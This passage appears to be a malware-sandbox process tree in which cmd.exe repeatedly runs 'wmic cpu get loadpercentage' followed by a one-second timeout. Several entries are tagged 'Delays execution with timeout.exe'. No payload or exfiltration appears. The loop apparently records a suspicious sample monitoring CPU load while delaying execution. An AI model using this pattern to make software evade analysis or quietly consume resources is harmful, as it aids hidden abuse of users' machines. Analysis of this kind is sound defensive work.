-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5072
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4304
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2240
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2108
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3020
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:956
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3532
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1152
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2256
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:452
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3064
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2828
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4880
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5024
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2880
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4680
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1332
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2200
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3600
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2424
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4860
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3324
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3984
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:704
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1708
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3128
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3896
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4736
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4308
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1900
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2032
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4524
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2688
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3612
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3040
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4068
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4220
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3580
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2872
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2684
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1508
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2428
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4024
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2160
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1660
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3252
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5060
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4364
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4940
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:984
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4952
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3548
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1288
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3420
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4820
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2604
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3492
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4812
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3336
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2020
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1568
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2188
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3444
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3512
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2460
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2368
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2420
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4628
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1972
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2292
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3380
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4720
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:856
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2444
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3576
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1656
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4688
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4376
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2392
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2636
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4664
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5016
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1680
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1460
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1612
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3012
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2748
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1348
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1496
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2332
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4488
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4768
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1476
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4792
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4668
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3624
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1528
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:260
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4064
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2388
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4116
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:720
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2696
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5032
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3784
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1540
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4944
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1200
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2032
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1076
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1912
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4416
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2272
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3328
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3536
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3496
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:396
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4412
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3340
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3464
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1212
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4516
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2816
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1192
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4940
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2840
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2800
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4952
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:864
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2560
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2236
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1352
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4820
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:592
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3492
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4576
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3336
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3892
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2188
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2288
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3048
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1408
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3512
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:616
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4628
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3880
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2292
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3852
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1952
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:888
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1040
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3744
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3308
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1876
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:236
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:700
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2804
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3348
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:240
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1680
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:956
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1536
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2944
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2748
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:220
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3236
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1556
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1812
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4708
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5068
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1476
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2424
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4668
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2892
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2448
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3660
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1176
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3472
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4116
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3896
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4736
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:920
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:1448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2940
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4224
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2976
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:900
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4524
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1668
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:788
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:952
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1028
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4976
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3536
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4956
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:396
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2080
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1368
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:5028
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1156
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3388
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3264
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3124
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3252
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4516
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3332
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4940
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:984
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3360
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2576
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1236
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3420
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4888
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1676
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1968
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3888
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3892
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3088
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2288
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3528
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:244
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1304
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1320
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1480
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3880
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3852
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:3380
-
-
